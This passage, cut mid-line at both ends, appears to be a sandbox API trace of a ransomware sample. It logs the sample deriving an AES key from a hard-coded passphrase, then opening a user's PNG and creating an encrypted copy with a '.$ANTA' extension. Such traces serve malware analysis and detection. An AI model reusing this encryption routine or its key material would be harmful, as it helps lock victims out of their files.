lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0093.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0093.611] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0093.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0093.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.612] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0093.612] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.660] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cab80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0093.660] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.707] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0093.707] CryptHashData (hHash=0x41ac280, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0093.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.708] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0093.708] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0093.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0093.708] CryptDestroyHash (hHash=0x41ac280) returned 1 [0093.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0093.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0093.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0093.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0093.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0093.710] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0093.710] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0093.710] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ewwh.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0093.711] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.711] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.712] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.712] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0093.712] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0093.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0093.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0093.715] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ewwh.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0093.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0093.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.716] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0093.717] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0093.717] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0093.717] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0093.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0093.722] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0093.722] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x4807, lpOverlapped=0x0) returned 1 [0093.723] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, 